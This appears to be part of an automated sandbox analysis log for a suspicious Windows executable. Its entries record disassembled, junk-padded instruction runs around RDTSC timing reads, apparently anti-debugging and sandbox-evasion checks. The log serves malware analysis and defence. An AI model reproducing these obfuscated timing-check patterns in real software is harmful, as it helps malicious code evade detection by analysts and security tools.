Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A9C second address: BA2AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2EF1 second address: BA2EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2EF5 second address: BA2F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC22CC1B8BAh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2F1B second address: BA2F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2F1F second address: BA2F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA810F second address: BA811D instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA8388 second address: BA83C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC22CC1B8C3h 0x0000000f jmp 00007FC22CC1B8B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1B262 second address: B1B28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FC22D01ECD9h 0x0000000c pushad 0x0000000d jnc 00007FC22D01ECC6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02A1 second address: BB02B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC22CC1B8A6h 0x0000000e jbe 00007FC22CC1B8A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02B5 second address: BB02C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC22D01ECCEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02C6 second address: BB02CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02CC second address: BB02D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FC22D01ECC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08C6 second address: BB08CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08CB second address: BB08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC22D01ECC6h 0x0000000a jmp 00007FC22D01ECD9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB08EE second address: BB0902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC22CC1B8AAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB0902 second address: BB0911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB54F5 second address: BB550A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB550A second address: BB5510 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB5510 second address: BB5554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FC22CC1B8B9h 0x0000000c jmp 00007FC22CC1B8ADh 0x00000011 jns 00007FC22CC1B8A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC22CC1B8ACh 0x0000001e jmp 00007FC22CC1B8B7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61776 second address: B6177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6177C second address: B61801 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ebx, dword ptr [ebp+1248B8E2h] 0x00000011 mov edi, dword ptr [ebp+12457ACAh] 0x00000017 add eax, ebx 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FC22CC1B8A8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov edi, ebx 0x00000035 push eax 0x00000036 jnl 00007FC22CC1B8B4h 0x0000003c mov dword ptr [esp], eax 0x0000003f jmp 00007FC22CC1B8B0h 0x00000044 jmp 00007FC22CC1B8AFh 0x00000049 push 00000004h 0x0000004b js 00007FC22CC1B8ACh 0x00000051 sub dword ptr [ebp+122D261Eh], esi 0x00000057 nop 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB644E second address: BB645E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 js 00007FC22D01ECEAh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB645E second address: BB6464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB6464 second address: BB6468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA6E7 second address: BBA702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA702 second address: BBA72A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 ja 00007FC22D01ECC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007FC22D01ECD2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA72A second address: BBA738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA738 second address: BBA73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA73E second address: BBA742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBA742 second address: BBA746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B25 second address: BB9B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B2E second address: BB9B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB9B34 second address: BB9B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBBE9A second address: BBBEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BBBEA3 second address: BBBEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC4170 second address: BC4187 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC22D01ECCDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC4187 second address: BC418B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2181 second address: BC2187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2187 second address: BC218D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC218D second address: BC2195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2757 second address: BC2775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007FC22CC1B8B2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2CF9 second address: BC2CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2CFE second address: BC2D0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FC22CC1B8A6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC2D0E second address: BC2D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC32C1 second address: BC32C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC32C7 second address: BC3306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FC22D01ECD3h 0x00000010 jmp 00007FC22D01ECCEh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FC22D01ECC6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC3306 second address: BC330A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC330A second address: BC3310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC3310 second address: BC3333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC22CC1B8B8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C1A second address: BC8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C2B second address: BC8C39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C39 second address: BC8C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C3F second address: BC8C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BC8C45 second address: BC8C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBE06 second address: BCBE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC22CC1B8A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBF5B second address: BCBF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCBF5F second address: BCBF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC22CC1B8A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC09D second address: BCC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC0A3 second address: BCC0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B7h 0x00000009 popad 0x0000000a jmp 00007FC22CC1B8B1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC222 second address: BCC252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC22D01ECD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC37B second address: BCC381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BCC655 second address: BCC65C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD45E0 second address: BD45E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD329A second address: BD32A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD32A0 second address: BD32A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD2341 second address: BD2358 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC22D01ECCEh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD2358 second address: BD2370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9D8D second address: BD9D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9D91 second address: BD9DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BD9DAD second address: BD9DC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC22D01ECD2h 0x00000008 jc 00007FC22D01ECE5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BDCC66 second address: BDCC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BDCC6A second address: BDCC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09D4 second address: BE09DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09DA second address: BE09DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE09DE second address: BE0A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC22CC1B8C0h 0x0000000c jmp 00007FC22CC1B8B8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jc 00007FC22CC1B8C0h 0x0000001a pushad 0x0000001b jc 00007FC22CC1B8A6h 0x00000021 jng 00007FC22CC1B8A6h 0x00000027 jc 00007FC22CC1B8A6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2E3E second address: BE2E57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FC22D01ECD0h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2C92 second address: BE2CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CAC second address: BE2CC2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CC2 second address: BE2CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BE2CC8 second address: BE2CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF87E second address: BEF882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF882 second address: BEF886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF886 second address: BEF8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC22CC1B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC22CC1B8B0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF8A2 second address: BEF8F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD8h 0x00000008 jmp 00007FC22D01ECD9h 0x0000000d jmp 00007FC22D01ECD8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF42A second address: BEF43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8ADh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BEF43D second address: BEF441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAAFB second address: BFAB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAB05 second address: BFAB0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFAB0A second address: BFAB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BFC19D second address: BFC1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF2F second address: C0DF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FC22CC1B8A6h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF5A second address: C0DF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF5E second address: C0DF6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: C0DF6C second address: C0DF8F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC22D01ECD9h 0x0000000f rdtsc
